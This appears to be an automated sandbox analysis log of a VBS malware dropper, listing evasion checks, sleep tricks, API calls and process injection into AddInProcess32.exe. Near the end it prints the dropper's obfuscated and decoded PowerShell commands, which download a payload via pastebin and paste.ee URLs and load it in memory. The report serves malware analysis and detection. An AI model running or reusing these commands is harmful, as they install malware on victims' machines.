                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0040F7E2 Sleep,ExitProcess
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9BA40FC5 sldt word ptr [eax]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0041A7D9 OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (identical row reported 6 times)
                    Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1666
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1388
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3610
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6222
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4090
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4430
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Window / User API: threadDelayed 5272
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Window / User API: threadDelayed 4192
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Window / User API: foregroundWindowGot 1735
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2200 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1748 | Thread sleep count: 3610 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1748 | Thread sleep count: 6222 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112 | Thread sleep time: -16602069666338586s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3228 | Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5228 | Thread sleep count: 4090 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6788 | Thread sleep count: 4430 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4180 | Thread sleep time: -12912720851596678s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1196 | Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6888 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5408 | Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7396 | Thread sleep count: 171 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7396 | Thread sleep time: -85500s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7400 | Thread sleep count: 5272 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7400 | Thread sleep time: -15816000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7400 | Thread sleep count: 4192 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7400 | Thread sleep time: -12576000s >= -30000s
                    Source: C:\Windows\System32\PING.EXE | Last function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00407877 FindFirstFileW,FindNextFileW,8_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_00407CD2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: powershell.exe, 00000003.00000002.1947421542.000002603DC8D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
                    Source: PING.EXE, 00000005.00000002.1760881316.000002468DF39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllaaN
                    Source: powershell.exe, 00000003.00000002.1886765737.00000260258D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
                    Source: powershell.exe, 00000006.00000002.1803498782.00000201EA48A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI call chain: ExitProcess graph end nodegraph_8-48316
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CBE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00443355 mov eax, dword ptr fs:[00000030h]8_2_00443355
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_004120B2 GetProcessHeap,HeapFree,8_2_004120B2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0043503C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0043BB71
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00434BD8 SetUnhandledExceptionFilter,8_2_00434BD8

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat textJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: D17008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 8_2_00412132
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00419662 mouse_event,8_2_00419662
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a
?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', 